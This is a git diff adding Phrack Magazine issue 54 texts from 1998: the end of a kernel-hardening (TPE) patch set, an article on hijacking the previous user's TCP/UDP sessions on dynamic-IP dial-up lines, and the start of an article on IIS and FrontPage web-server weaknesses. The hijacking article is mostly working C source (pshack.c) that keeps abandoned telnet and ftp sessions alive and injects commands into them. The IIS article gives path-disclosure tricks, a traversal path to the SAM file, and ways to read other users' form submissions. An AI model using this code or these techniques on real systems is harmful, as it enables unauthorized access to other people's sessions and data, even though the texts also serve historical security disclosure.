+    ));
+
+
+/*
+ *  Verify a candidate user.
+ */
+int
+tpe_verify __P((
+    uid_t       /* candidate user for verification */
+    ));
+
+
+/*
+ *  Insertion sort the list.
+ */
+void
+tpe_sort __P((
+    int,        /* list low element */
+    int         /* list high high element */
+    ));
+
+
+/*
+ *  Locate a uid in the list, standard recursive binary search, running in
+ *  worst case of lg N.
+ */
+int
+tpe_search __P((
+    uid_t,      /* candidate user to search for */
+    int,        /* list low element */
+    int         /* list high high element */
+    ));
+
+#endif	/* __KERN_TPE_H */
+/* EOF */
+<-->
+<++> PP/Patch/PP-diff
+--- ./usr.bin/fstat/fstat.c.orig	Tue Oct 20 10:43:58 1998
++++ ./usr.bin/fstat/fstat.c	Tue Oct 20 10:47:22 1998
+@@ -158,6 +158,7 @@
+ 	char *memf, *nlistf;
+ 	char buf[_POSIX2_LINE_MAX];
+ 	int cnt;
++        pid_t __uid;
+ 
+ 	arg = 0;
+ 	what = KERN_PROC_ALL;
+@@ -248,7 +249,12 @@
+ 	else
+ 		putchar('\n');
+ 
++        __uid = getuid();
+ 	for (plast = &p[cnt]; p < plast; ++p) {
++                if (__uid)
++                {
++                    if (p->kp_eproc.e_pcred.p_ruid != __uid) continue;
++                }
+ 		if (p->kp_proc.p_stat == SZOMB)
+ 			continue;
+ 		dofiles(p);
+--- ./bin/ps/ps.c.orig	Tue Oct 20 10:48:40 1998
++++ ./bin/ps/ps.c	Tue Oct 20 10:51:26 1998
+@@ -112,6 +112,7 @@
+ 	dev_t ttydev;
+ 	pid_t pid;
+ 	uid_t uid;
++        uid_t __uid;
+ 	int all, ch, flag, i, fmt, lineno, nentries;
+ 	int prtheader, wflag, what, xflg;
+ 	char *nlistf, *memf, *swapf, errbuf[_POSIX2_LINE_MAX];
+@@ -281,6 +282,8 @@
+ 	if (!all && ttydev == NODEV && pid == -1)  /* XXX - should be cleaner */
+ 		uid = getuid();
+ 
++        __uid = getuid();
++
+ 	/*
+ 	 * scan requested variables, noting what structures are needed,
+ 	 * and adjusting header widths as appropiate.
+@@ -330,6 +333,20 @@
+ 	for (i = lineno = 0; i < nentries; i++) {
+ 		KINFO *ki = &kinfo[i];
+ 
++                /*
++                 *  root gets to see the whole proccess list.
++                 */
++                if (__uid)
++                {
++                    /*
++                     *  If the process in question is not our own, we do not
++                     *  get to see it.
++                     */
++                    if (kinfo[i].ki_p->kp_eproc.e_pcred.p_ruid != __uid)
++                    {
++                        continue;
++                    }
++                }
+ 		if (xflg == 0 && (KI_EPROC(ki)->e_tdev == NODEV ||
+ 		    (KI_PROC(ki)->p_flag & P_CONTROLT ) == 0))
+ 			continue;
+--- ./usr.bin/w/w.c.orig	Tue Oct 20 10:52:02 1998
++++ ./usr.bin/w/w.c	Tue Oct 20 10:54:46 1998
+@@ -131,6 +131,7 @@
+ 	int ch, i, nentries, nusers, wcmd;
+ 	char *memf, *nlistf, *p, *x;
+ 	char buf[MAXHOSTNAMELEN], errbuf[_POSIX2_LINE_MAX];
++        uid_t __uid;
+ 
+ 	/* Are we w(1) or uptime(1)? */
+ 	p = __progname;
+@@ -332,6 +333,14 @@
+ 			    ep->utmp.ut_host + UT_HOSTSIZE - x, x);
+ 			p = buf;
+ 		}
++                __uid = getuid();
++                if (__uid)
++                (void)printf("%-*.*s %-2.2s %-*.*s ",
++                    UT_NAMESIZE, UT_NAMESIZE, ep->utmp.ut_name,
++                    strncmp(ep->utmp.ut_line, "tty", 3) ?
++                    ep->utmp.ut_line : ep->utmp.ut_line + 3,
++                    UT_HOSTSIZE, UT_HOSTSIZE, "<skulking about>");
++                else
+ 		(void)printf("%-*.*s %-2.2s %-*.*s ",
+ 		    UT_NAMESIZE, UT_NAMESIZE, ep->utmp.ut_name,
+ 		    strncmp(ep->utmp.ut_line, "tty", 3) ?
+@@ -339,7 +348,14 @@
+ 		    UT_HOSTSIZE, UT_HOSTSIZE, *p ? p : "-");
+ 		pr_attime(&ep->utmp.ut_time, &now);
+ 		pr_idle(ep->idle);
+-		pr_args(ep->kp);
++                if (__uid)
++                {
++                    printf("<this n' that>");
++                }
++                else
++                {
++                    pr_args(ep->kp);                     
++                }
+ 		printf("\n");
+ 	}
+ 	exit(0);
+--- ./usr.bin/who/who.c.orig	Tue Aug 19 22:37:21 1997
++++ ./usr.bin/who/who.c	Tue Oct 20 10:57:04 1998
+@@ -227,6 +227,7 @@
+ 	char state = '?';
+ 	static time_t now = 0;
+ 	time_t idle = 0;
++        uid_t __uid;
+ 
+ 	if (show_term || show_idle) {
+ 		if (now == 0)
+@@ -265,8 +266,15 @@
+ 			(void)printf(" old  ");
+ 	}
+ 	
+-	if (*up->ut_host)
+-		printf("\t(%.*s)", UT_HOSTSIZE, up->ut_host);
++        __uid = getuid();
++        if (__uid)
++        {
++            printf("\t<skulking about>");
++        }
++        else if (*up->ut_host)
++        {
++            printf("\t(%.*s)", UT_HOSTSIZE, up->ut_host);
++        }
+ 	(void)putchar('\n');
+ }
+<--> 
+<++> TPE/Core/Patch/ld.so-diff
+--- gnu/usr.bin/ld/rtld/rtld.c.old	Thu Oct 22 20:44:52 1998
++++ gnu/usr.bin/ld/rtld/rtld.c	Sat Oct 24 16:44:00 1998
+@@ -39,6 +39,8 @@
+ #include <sys/resource.h>
+ #include <sys/errno.h>
+ #include <sys/mman.h>
++#include <sys/syscall.h>
++#include "/usr/src/sys/sys/kern_tpe.h"
+ #ifndef MAP_COPY
+ #define MAP_COPY	MAP_PRIVATE
+ #endif
+@@ -150,7 +152,9 @@
+ static uid_t		uid, euid;
+ static gid_t		gid, egid;
+ static int		careful;
++static int		tpe_ld_strip;
+ static int		anon_fd = -1;
++static uid_t            list[TPE_ACL_SIZE];
+ 
+ struct so_map		*link_map_head, *main_map;
+ struct so_map		**link_map_tail = &link_map_head;
+@@ -271,7 +275,20 @@
+ 
+ 	careful = (uid != euid) || (gid != egid);
+ 
+-	if (careful) {
++        if (syscall(SYS_tpe_adm, TPE_LDCHECK_S, -1, list) == -1)
++        {
++            fprintf(stderr, "Unknown internal error\n"); /* should NOT fail */
++            exit(EXIT_FAILURE);
++        }
++        if (list[0] && uid)
++        {
++            if (getenv("LD_PRELOAD") || getenv("LD_LIBRARY_PATH"))
++            {
++                fprintf(stderr, "Your environment contains illegal variables which are being stripped out for the execution of this program.\n");
++            }
++            tpe_ld_strip = 1;
++        }
++	if (careful || tpe_ld_strip) {
+ 		unsetenv("LD_LIBRARY_PATH");
+ 		unsetenv("LD_PRELOAD");
+ 	}
+<-->
+----[  EOF
diff --git a/phrack54/7.txt b/phrack54/7.txt
new file mode 100644
index 0000000..e524cc4
--- /dev/null
+++ b/phrack54/7.txt
@@ -0,0 +1,567 @@
+---[  Phrack Magazine   Volume 8, Issue 54 Dec 25th, 1998, article 07 of 12
+
+
+-------------------------[  Scavenging Connections On Dynamic-IP Networks
+
+
+--------[  Seth McGann <smm@wpi.edu> (www.el8.org) 11.29.98
+	
+
+
+----[  Purpose
+
+This paper will highlight a potentially serious loophole in networks that rely
+on dynamic IP assignment.  More specifically, dial-up dynamic IP assignment
+provided by almost every Internet Service Provider.  This problem will allow
+the unauthorized use of the previous host's connections, for instance, in
+progress telnet and ftp control sessions.  This issue is reminiscent of the
+problem where terminal servers would sometimes provide an already logged in
+session to a user lucky enough to call precisely after a forced disconnect due
+to line noise or other outside factor.
+
+
+----[  The Problem
+
+To perform this feat we rely on some well know concepts, usually employed for
+non-blind spoofing or session hijacking.  First, we have to understand what
+a connection looks like after an abrupt loss of service.  The key point is
+that the connection does not simply disappear, because there is no way for the
+disconnected host to notify the remote end that it has lost its link.  If the
+remote end tries to send more data and there is no host available, the upstream
+router will generate an ICMP unreachable and the connection will be terminated.
+If another dial-up user connects before the remote end has sent any more data
+the story is different.  For a TCP based connection, the kernel will see a
+packet going to an unconnected port, usually with PUSH and ACK set or simply
+ACK, and will generate a RST, ending the connection.  For an incident UDP
+packet, an ICMP unreachable is generated.  Either way the connection will
+evaporate.
+
+
+----[  The Solution
+
+Solving the problem is twofold.  We must first prevent the kernel from killing
+the connections and second we must make sure the remote end knows we are still
+alive, to prevent timeouts.  For UDP the answer is very simple.  As long as we
+block outbound ICMP unreachable packets the remote end won't disconnect.
+Application timeouts must be dealt with, of course.  For TCP we have a bigger
+problem, since the connections will die if not responded to.  To prevent our
+poisonous RST packets from reaching the remote side we simply block all
+outbound TCP traffic.  To keep the dialogue going, we simply ACK all incident
+PUSH|ACK packets and increment the ACK and SEQ numbers accordingly.  We
+recover data from packets with the PUSH flag set.  Additionally we can
+send data back down the connection by setting the PUSH and ACK flags on
+our outbound packets.
+
+
+----[  Implementation
+
+To stop our kernel from killing the latent connections, we first block all
+outbound traffic. Under linux a command such as the following would be
+effective:
+
+/sbin/ipfwadm -O -a deny -S 0.0.0.0/0  -P all -W ppp0
+
+Now, no RST packets or ICMP will get out.  We are essentially turning off
+kernel networking support and handling all the details ourselves.  This will
+not allow us to send using raw sockets, unfortunately.  SOCK_PACKET could
+be used, but in the interests of portability the firewall is simply opened
+to send a packet and then closed.  To be useful on a larger number of
+platforms, libpcap 0.4 was used for pulling packets off the wire and
+Libnet 0.8b was used for putting them back again.  The program itself is
+called pshack.c because that's basically all it does.  Additionally, it will
+allow you respond to in progress connections just in case you find a root
+shell.  It will also accept inbound connections, and allow you to reply to
+them.  Note, this will only work on Linux right now, due to the differences in
+handling of the firewall.  This is very minor and will be fixed soon.  It
+should compile without incident on RedHat 5.1 or 4.2 and on Slackware as well,
+given one change to the ip firewall header file, namely taking out the
+#include <linux/tcp.h> line.
+
+
+----[  Conclusions
+
+Using this program it is easy to scavenge telnet and ftp control sessions,
+or basically any low traffic, idle connection.  Grabbing ICQ sessions is a
+good example of a UDP based scavenge.  Obviously, streaming connections,
+such as ftp data will be ICMP to death before they can be scavenged.  It's
+interesting to note that hosts that drop ICMP unreachable packets, for fear
+of forged unreachable packets, are particularly vulnerable as they will not
+lose the connection as quickly.
+
+Required:
+
+libpcap 0.4  -> ftp://ftp.ee.lbl.gov/libpcap.tar.Z
+Libnet  0.8b -> http://www.infonexus.com/~daemon9/Projects/Libnet/
+
+<++> scavenge/pshack.c
+/* - PshAck.c - Attempts to scavenge connections when you dial up an ISP.
+ *   Author:    Seth McGann <smm@wpi.edu> / www.el8.org (Check papers section)
+ *   Date:      11/29/98
+ *   Greets:    dmess0r,napster,awr,all things w00w00,#203
+ *   Version:   0.3
+ *
+ *   Usage:
+ *              1.  Dial up your ISP and start pshack up.
+ *              2.  If you are lucky you will see connections you did not
+ *		    make :)
+ *              3.  Repeat the procedure.
+ *   Options:
+ *             -i: The interface
+ *             -l: Link offset
+ *             -s: Your source IP
+ *
+ *   Compiling: 'gcc pshack.c -o pshack -lnet -lpcap' should work given you have
+ *              libpcap and Libnet installed properly.
+ *
+ *              libpcap 0.4 : ftp://ftp.ee.lbl.gov/libpcap.tar.Z
+ *              Libnet  0.8b: http://www.infonexus.com/~daemon9/Projects/Libnet/
+ *
+ *   Have fun!
+ */
+
+#define __BSD_SOURCE
+#include <netinet/udp.h>
+#define __FAVOR_BSD
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <syslog.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <net/if.h>
+#include <libnet.h>
+#include <pcap.h>
+#include <netinet/ip_fw.h>
+#include <setjmp.h>
+
+/* #define DEBUGIT */
+
+#ifdef DEBUGIT
+#define DEFAULT_INTERFACE "eth1"
+#define DEFAULT_OFFSET    14
+#else
+#define DEFAULT_INTERFACE "ppp0"   /* Default is PPP with no linklayer */
+#define DEFAULT_OFFSET    0
+#endif
+
+struct conn {
+	u_int    type;
+	u_long   src,dst,seq,ack;
+	u_short  sport,dport;
+};
+
+void clean_exit(int);
+void time_out(int);
+void usage(char *);
+void dump_packet( u_char *, int );
+int update_db( u_char *, int, struct conn*);
+void dump_db (struct conn*);
+
+char errbuf[2000];
+sigjmp_buf env;
+
+
+
+int
+main (int argc, char **argv) {
+
+	struct ip     *ip_hdr;
+	struct tcphdr *tcp_hdr;
+	struct udphdr *udp_hdr;
+	struct ip_fw  fw;
+	struct ifreq  ifinfo;
+	struct pcap_pkthdr ph;
+	pcap_t        *pd;
+	u_long        local=0,seq,ack;
+	u_short	      flags=0;
+	u_char        *d_ptr,*packet;
+	u_char	      *pbuf=malloc(TCP_H+IP_H+500);
+	char 	      iface[17],sendbuf[500];
+	int           osock,sfd,linkoff,i,datalen,newsize,dbsize=0;
+	struct conn   conn[100];         /* WAY more than enough */
+	char arg;	
+        fd_set rfds;
+        struct timeval tv;
+        int retval;
+	char user[500];
+	
+	
+        strcpy(iface,DEFAULT_INTERFACE);
+        linkoff=DEFAULT_OFFSET;
+
+	while((arg = getopt(argc,argv,"i:s:l:")) != EOF){
+            switch(arg) {
+	          case 's':
+	          local=inet_addr(optarg);
+	          break;
+	          case 'i':
+	          strncpy(iface,optarg,16);
+	          break;
+	          case 'l':
+	          linkoff=atoi(optarg);
+	          break;
+	          default:
+	          usage(argv[0]);
+	          break;
+	     }
+        }
+
+	printf("* Blocking till %s comes up *\n",iface);
+	
+        do {pd=pcap_open_live(iface,1500,0,500,errbuf);}while(!pd);
+	
+	printf("* Configuring Raw Output *\n");
+	osock=open_raw_sock(IPPROTO_RAW);
+        if (osock<0)perror("socket()"),exit(1);
+	strcpy(ifinfo.ifr_ifrn.ifrn_name,iface);
+        if(ioctl(osock,SIOCGIFFLAGS,&ifinfo)<0)perror("ioctl()"),exit(1);
+        if(ioctl(osock,SIOCSIFFLAGS,&ifinfo)<0)perror("ioctl()"),exit(1);
+        if(ioctl(osock,SIOCGIFADDR,&ifinfo)<0)perror("ioctl()"),exit(1);
+	
+        bcopy(&ifinfo.ifr_addr.sa_data[2],&local,4);
+	printf("* Address: %s\n",host_lookup(local,0));
+
+        printf("* Blocking Outbound on %s *\n",iface);
+	sfd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
+        if(sfd<0) perror("socket()"),exit(1);
+
+	bzero(&fw,sizeof(fw));
+        strcpy(fw.fw_vianame,iface);
+        #ifdef DEBUGIT
+	fw.fw_flg=IP_FW_F_ICMP;
+        if(setsockopt(sfd,IPPROTO_IP,IP_FW_INSERT_OUT,&fw,sizeof(fw))<0)
+        perror("setsockopt()"),exit(1);
+	fw.fw_flg=IP_FW_F_TCP;
+        fw.fw_nsp=1;
+        fw.fw_pts[0]=666;
+        #endif
+        if(setsockopt(sfd,IPPROTO_IP,IP_FW_INSERT_OUT,&fw,sizeof(fw))<0)
+        perror("setsockopt()"),exit(1);
+
+	signal(SIGTERM,clean_exit);
+	signal(SIGINT,clean_exit);
+	signal(SIGALRM,time_out);	
+
+	printf("* Entering Capture Loop *\n\n");
+	printf("* Commands [1] Dump databese\n"
+	       "           [2] Send on connection <n> Ex: 2 1 ls -al\n"
+	       "           [3] Exit\n\n");
+	sigsetjmp(env,1);
+	
+	FD_ZERO(&rfds);
+        FD_SET(0, &rfds);
+        tv.tv_sec = 0;
+	tv.tv_usec = 0;
+
+        retval = select(1, &rfds, NULL, NULL, &tv);
+	
+	if (retval) {
+	   retval=read(1,user,sizeof(user));
+	   user[retval]=0;
+	   switch(user[0]) {
+             case '1':
+       	     dump_db(conn);
+             break;
+	     case '2':
+	     i=atoi(&user[2]);
+	     if (i > dbsize) {
+	         printf("* Invalid connection index) *\n");
+	         break;
+             }
+             build_ip(TCP_H,
+           	      101,
+		      0,
+           	      IP_DF,
+	       	      128,
+		      IPPROTO_TCP,
+		      local,
+         	      htonl(conn[i].src),
+	     	      NULL, 0, pbuf);
+	
+	     build_tcp(conn[i].dport,
+		       conn[i].sport,
+		       conn[i].seq,
+                       conn[i].ack,
+		       TH_PUSH|TH_ACK, 31000, 0,user+4,strlen(user+4),
+                           pbuf + IP_H);
+
+	     do_checksum(pbuf, IPPROTO_TCP, TCP_H+strlen(user+4));
+	     setsockopt(sfd,IPPROTO_IP,IP_FW_DELETE_OUT,&fw,sizeof(fw));
+	     write_ip(osock, pbuf, TCP_H + IP_H + strlen(user+4));
+             setsockopt(sfd,IPPROTO_IP,IP_FW_INSERT_OUT,&fw,sizeof(fw));
+
+ 	     printf("Sent: %s\n",user+4);
+             break;
+	     case '3':
+	     clean_exit(1);
+	     break;
+	     default:
+             break;
+           }
+	}
+	alarm(1);
+	
+	for(;packet=pcap_next(pd,&ph);) {
+	
+        ip_hdr = (struct ip *)(packet + linkoff);
+	
+	switch(ip_hdr->ip_p) {
+	
+	case IPPROTO_TCP:
+             tcp_hdr=(struct tcphdr*)(((char*)ip_hdr)+(4*ip_hdr->ip_hl));
+	     dump_packet(packet,linkoff);
+	     #ifdef DEBUGIT
+	     if ((ntohl(ip_hdr->ip_src.s_addr) != local) &&
+		 ntohs(tcp_hdr->th_dport)==666) {
+	     #else
+	     if (ntohl(ip_hdr->ip_src.s_addr) != local) {
+	     #endif
+	     newsize=update_db(packet, linkoff, conn);
+
+	     if(newsize>dbsize) {
+             printf("New Connect:\n");
+             dbsize=newsize;}
+
+	     if (tcp_hdr->th_flags&TH_PUSH || (tcp_hdr->th_flags&TH_SYN &&
+	 	 tcp_hdr->th_flags&TH_ACK)) {
+		 datalen=ntohs(ip_hdr->ip_len)-IP_H-TCP_H;
+		 if(!datalen) datalen++;
+
+	         seq=ntohl(tcp_hdr->th_ack);
+		 ack=ntohl(tcp_hdr->th_seq)+datalen;
+		 flags=TH_ACK;
+  		 } else if(tcp_hdr->th_flags&TH_SYN) {
+		 seq=get_prand(PRu32);
+		 ack=ntohl(tcp_hdr->th_seq)+1;
+		 flags=TH_SYN|TH_ACK;
+	      	 }
+
+	         if(flags) {
+                 build_ip(TCP_H,
+			  101,
+			  0,
+		 	  IP_DF,
+	       		  128,
+			  IPPROTO_TCP,
+			  local,
+                          ip_hdr->ip_src.s_addr,
+			  NULL, 0, pbuf);
+	
+		 build_tcp(ntohs(tcp_hdr->th_dport),
+		           ntohs(tcp_hdr->th_sport),
+		           seq,
+                           ack,
+		           flags, 31000, 0, NULL, 0, pbuf + IP_H);
+
+		 do_checksum(pbuf, IPPROTO_TCP, TCP_H);
+		 setsockopt(sfd,IPPROTO_IP,IP_FW_DELETE_OUT,&fw,sizeof(fw));
+                 write_ip(osock, pbuf, TCP_H + IP_H);
+                 setsockopt(sfd,IPPROTO_IP,IP_FW_INSERT_OUT,&fw,sizeof(fw));
+		 flags=0; }
+	     }
+	     break;
+	
+	case IPPROTO_UDP:
+	     dump_packet(packet,linkoff);
+	     break;
+	default:
+	break;
+	    }
+	  }
+
+}
+
+
+void
+dump_packet( u_char *packet, int linkoff ) {
+
+	struct ip     *ip_hdr;
+	struct tcphdr *tcp_hdr;
+	struct udphdr *udp_hdr;
+	u_char        *d_ptr;
+	u_int         i;
+
+	ip_hdr = (struct ip *)(packet + linkoff);
+	
+	switch (ip_hdr->ip_p) {
+	
+	case IPPROTO_TCP:
+	tcp_hdr=(struct tcphdr*)(((char*)ip_hdr)+(4*ip_hdr->ip_hl));
+	
+	printf("********************\n");
+	printf("TCP: %s.%d->%s.%d SEQ: %u ACK: %u\n "
+	       "Flags: %c%c%c%c%c%c Data Len: %d\n",
+		host_lookup(ip_hdr->ip_src.s_addr,0),
+		ntohs(tcp_hdr->th_sport),
+		host_lookup(ip_hdr->ip_dst.s_addr,0),
+		ntohs(tcp_hdr->th_dport),
+	        ntohl(tcp_hdr->th_seq),
+	        ntohl(tcp_hdr->th_ack),	
+	        (tcp_hdr->th_flags & TH_URG)  ? 'U' : '-',
+                (tcp_hdr->th_flags & TH_ACK)  ? 'A' : '-',
+                (tcp_hdr->th_flags & TH_PUSH) ? 'P' : '-',
+                (tcp_hdr->th_flags & TH_RST)  ? 'R' : '-',
+                (tcp_hdr->th_flags & TH_SYN)  ? 'S' : '-',
+                (tcp_hdr->th_flags & TH_FIN)  ? 'F' : '-',
+                ntohs(ip_hdr->ip_len)-IP_H-TCP_H);
+	
+		d_ptr=packet+linkoff+TCP_H+IP_H;
+
+                for(i=0;i<(ntohs(ip_hdr->ip_len)-IP_H-TCP_H);i++)
+                   if (d_ptr[i]=='\n')
+		      printf("\n");
+                   else if (d_ptr[i]>0x1F && d_ptr[i]<0x7F)
+		           printf("%c",d_ptr[i]);
+                        else
+                           printf (".");
+
+		printf("\n");
+		break;
+
+	case IPPROTO_UDP:
+
+	udp_hdr=(struct udphdr*)(((char*)ip_hdr) + (4 * ip_hdr->ip_hl));
+	printf("********************\n");
+	printf("UDP: %s.%d->%s.%d Data Len: %d\n",
+               host_lookup(ip_hdr->ip_src.s_addr,0),
+               ntohs(udp_hdr->uh_sport),
+               host_lookup(ip_hdr->ip_dst.s_addr,0),
+               ntohs(udp_hdr->uh_dport),
+	       ntohs(ip_hdr->ip_len)-IP_H-UDP_H);
+
+	d_ptr=packet+linkoff+UDP_H+IP_H;
+        for(i=0;i<(ntohs(udp_hdr->uh_ulen)-UDP_H);i++)
+            if (d_ptr[i]=='\n')
+               printf("\n");
+            else if (d_ptr[i]>0x19 && d_ptr[i]<0x7F)
+                    printf("%c",d_ptr[i]);
+                 else
+		    printf(".");
+	
+	printf("\n");
+	break;
+
+ 	default:
+	/* We ignore everything else */
+	break;
+	}
+	
+}
+
+void
+clean_exit(int val) {
+
+	int sfd,p=0;
+
+        sfd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
+        if (sfd<0) perror("socket()"),exit(1);
+        if(setsockopt(sfd,IPPROTO_IP,IP_FW_FLUSH_OUT,&p,sizeof(p))<0)
+        perror("setsockopt()"),exit(1);
+        exit(0);
+}
+
+
+void
+usage(char *arg) {
+       	printf("%s: [options]\n"
+               "  -i: The interface\n"
+	       "  -l: Link offset\n"
+               "  -s: Your source IP\n\n",arg);
+        exit(0);
+}
+
+void
+dump_db (struct conn *conn) {
+
+	int i;
+	
+
+	for(i=0;conn[i].type;i++)
+	   if(conn[i].type==IPPROTO_TCP)
+	   printf("%d: TCP: %s.%d->%s.%d SEQ: %u ACK: %u\n",
+	           i, host_lookup(htonl(conn[i].src),0),conn[i].sport,
+	           host_lookup(htonl(conn[i].dst),0), conn[i].dport,
+	           conn[i].seq,conn[i].ack);
+	   else if(conn[i].type==IPPROTO_UDP)
+	   printf("%d: UDP: %s.%d->%s.%d\n",
+	           i, host_lookup(htonl(conn[i].src),0),conn[i].sport,
+	           host_lookup(htonl(conn[i].dst),0), conn[i].dport);
+	  else break;
+
+
+}
+
+
+int
+update_db( u_char *packet, int linkoff, struct conn *conn) {
+	struct ip     *ip_hdr;
+	struct tcphdr *tcp_hdr;
+	struct udphdr *udp_hdr;
+	int i=0;
+	ip_hdr = (struct ip *)(packet + linkoff);
+
+	switch(ip_hdr->ip_p) {
+
+	case IPPROTO_TCP:
+	tcp_hdr=(struct tcphdr*)(((char*)ip_hdr)+(4*ip_hdr->ip_hl));
+
+	for(i=0;conn[i].type;i++)
+	   if(conn[i].type==IPPROTO_TCP)
+	    if(ip_hdr->ip_src.s_addr==htonl(conn[i].src))
+             if(ip_hdr->ip_dst.s_addr==htonl(conn[i].dst))
+	      if(ntohs(tcp_hdr->th_sport)==conn[i].sport)
+	       if(ntohs(tcp_hdr->th_dport)==conn[i].dport)
+                    break;
+
+	if(conn[i].type) {
+          conn[i].seq=ntohl(tcp_hdr->th_ack);
+	  conn[i].ack=ntohl(tcp_hdr->th_seq); }
+        else {
+	  conn[i].type=IPPROTO_TCP;
+	  conn[i].src=ntohl(ip_hdr->ip_src.s_addr);
+	  conn[i].dst=ntohl(ip_hdr->ip_dst.s_addr);
+	  conn[i].sport=ntohs(tcp_hdr->th_sport);
+	  conn[i].dport=ntohs(tcp_hdr->th_dport);
+          conn[i].seq=ntohl(tcp_hdr->th_ack);
+	  conn[i].ack=ntohl(tcp_hdr->th_seq); }		
+
+	break;
+
+	case IPPROTO_UDP:
+	udp_hdr=(struct udphdr*)(((char*)ip_hdr)+(4*ip_hdr->ip_hl));
+
+	for(i=0;conn[i].type;i++)
+          if(conn[i].type==IPPROTO_TCP)
+	    if(ntohl(ip_hdr->ip_src.s_addr)==conn[i].src)
+       	     if(ntohl(ip_hdr->ip_dst.s_addr)==conn[i].dst)
+	       if(ntohs(udp_hdr->uh_sport)==conn[i].sport)
+	         if(ntohs(udp_hdr->uh_dport)==conn[i].dport) break;
+
+	if(!conn[i].type) {
+	  conn[i].type=IPPROTO_UDP;
+	  conn[i].src=ntohl(ip_hdr->ip_src.s_addr);
+	  conn[i].dst=ntohl(ip_hdr->ip_dst.s_addr);
+	  conn[i].sport=ntohs(udp_hdr->uh_sport);
+	  conn[i].dport=ntohs(udp_hdr->uh_dport); }
+
+	break;
+	default:
+	/* We Don't care */
+	break;
+      }
+      return i;
+
+}
+
+void
+time_out(int blank) {
+alarm(0);
+siglongjmp(env,1);
+}
+
+/* EOF */
+<-->
+
+----[  EOF
diff --git a/phrack54/8.txt b/phrack54/8.txt
new file mode 100644
index 0000000..c2e22ef
--- /dev/null
+++ b/phrack54/8.txt
@@ -0,0 +1,483 @@
+---[  Phrack Magazine   Volume 8, Issue 54 Dec 25th, 1998, article 08 of 12
+
+
+-------------------------[  NT Web Technology Vulnerabilities
+
+              
+--------[  rain.forest.puppy / [WT] <rfpuppy@iname.com>
+
+
+*Note: most of the vulnerabilities in this document have NOT been made public;
+they were discovered by rain.forest.puppy, or other members of WT.  Lots
+of new toys out there on the Internet lately.  Seems like the web is the
+way to go, and every software spigot is demanding they be 'web-enabled'.  A
+lot are reinventing the wheel, bundling sub-standard web servers to serve up
+their HTML and Java interface.
+
+But this article isn't about them.  There's too many, and they're to easy to
+use as vulnerable targets.  It's much more fun to find the needle in the
+haystack, so I'm going to focus on some more common setups.  On to the show.
+
+
+----[  IIS 4.0
+
+IIS is not too bad as a web server.  It still doesn't compare to Apache, but
+it has flexible scripting and server-side abilities.  But, of course,
+everything has its price...
+
+One interesting problem (and probably the only one that may be previously
+published at the time of this writing) is that appending an ".idc" extension
+to the end of a URL will cause IIS installations to try to run the so-called
+.IDC through the database connector .DLL.  If the .IDC doesn't exist, than it
+returns a rather informative page stating that it can't open
+%documentroot%\<bogus name>.idc.  For example:
+
+	"Cannot open c:\inetpub\wwwroot\index.html.idc"
+
+Wow, absolute paths on the server.  Very interesting.  What good does this do?
+Well, it gives you some insight and hints.  If you're trying to exploit CGI or
+other server-based programs, knowing what drive you're on when trying to
+access outside documents blindly helps a lot.  For example, if the IDC query
+came back:
+
+	f:\webs\1\index.html.idc
+
+then you know you'll probably have to specify 'c:\' to get to any Windows NT
+system files; you can't do silly stuff like:
+
+	../../../../winnt/system/repair/sam._
+
+since you're doing relative addressing, and staying on drive F.  Another
+common return is something like"
+
+	"Cannot open d:\20x.140.3x.25\index.html.idc"
+
+Where the IP address is the full IP address of the webserver.  This usually
+indicates that the site is on a system that's probably hosting multiple
+websites.
+
+Also, usually the site that's based in \inetpub\wwwroot is the 'default' site,
+and may have other things associated with it (like sample files, etc...
+We'll get to these later).  This is important to remember.
+
+
+----[  FrontPage Webbots
+
+A really quick recap on how webbots work:  Frontpage inserts some HTML comments
+that specify the parameters of the webbot.  Then, the form is submitted to
+/_vti_bin/shtml.dll, and the URL of the page is given.  shtml.dll reads through
+the given page, and interprets the webbot/HTML comment code.
+
+So, all the parameters that are involved in (most) webbots are embedded in the
+HTML page themselves.  Let's take an example from a corporate site that makes
+a very popular FTP suite (this is HTML code):
+
+	<!--webbot BOT="GeneratedScript" endspan -->
+	<form method="POST" action="../_vti_bin/shtml.dll/downloads/ftp.html" 
+	name="FrontPage_Form1" webbot-action="--WEBBOT-SELF--">
+	<!--webbot bot="SaveResults" 
+	u-file="d:\us\product_downloads\download_log.csv"
+	s-format="TEXT/CSV" s-label-fields="FALSE" s-builtin-fields="Date Time" 
+	s-form-fields u-confirmation-url="../_confirmations/ftp.html"
+	startspan -->
+
+Notice that this site is saving the results to a file (and the fact that it
+has "d:\.." says that it is a Windows-based server).  But the more important
+part to notice is the 'u-confirmation-url' field.  This page has a large form
+for you to fill in.  When you submit it, what you entered is saved in the
+'u-file', and then you're redirected to 'u-confirmation-url'.  Don't want
+to give all your personal information to them?  Well, just go to
+'u-confirmation-url'.  In this case, this was a registration page for download
+of the eval.  Since I got tired of filling out my information all the
+time, I now just go to the confirmation URL and download away, bypassing the
+form.
+
+On a related note, if bot="SaveResults", and u-file is in the web structure
+(which it happens to be a lot on virtually hosted accounts), you're able to
+view the contents of the file.  For instance,
+
+	<!--webbot bot="SaveResults" 
+	u-file="/_private/download.log"
+	s-format="TEXT/TEXT" s-form-fields startspan -->
+
+means you can go to htp://site/_private/download.log and view all the info
+everyone else entered.
+
+
+----[  IIS 3.0 to IIS 4.0
+
+There are several changes between IIS 3.0 and IIS 4.0.  Sure, MMC is
+important and all, but there's something else even better: there are default
+associations made between certain file extensions and .DLLs.  Let's look at a
+particular example...
+
+In IIS 3.0, you'd administer the website by going to http://site/iisadmin/,
+which would pop over to using /scripts/iisadmin/ism.dll, and routing the
+various .HTR files in that directory through itself.  The .HTR files are
+relatively useless without ism.dll to process them, and ism.dll has hard-coded 
+authentication built into it.
+
+Now, upgrade from IIS 3.0 to 4.0.  You now administer your site through
+http://localhost:5416/.  What about all those .HTRs in /scripts/iisadmin?
+They're still there, unless you actually deleted them.  And the problem?
+IIS 4.0 associates all .HTRs with a new and improved ism.dll, which contains
+no hard-coded authentication.  So now, whenever you request a .HTR file,
+IIS will happily process it for you, not caring about authentication.  You
+can now use the .HTR files in /scripts/iisadmin to your liking.  Kinda.
+None of them work, due to so many changes. EXCEPT FOR ONE: bdir.htr.  bdir.htr
+seems to still be happy, and gladly shows you all the directories on any
+drive.  You can navigate all the server's drives (and network mappings), but
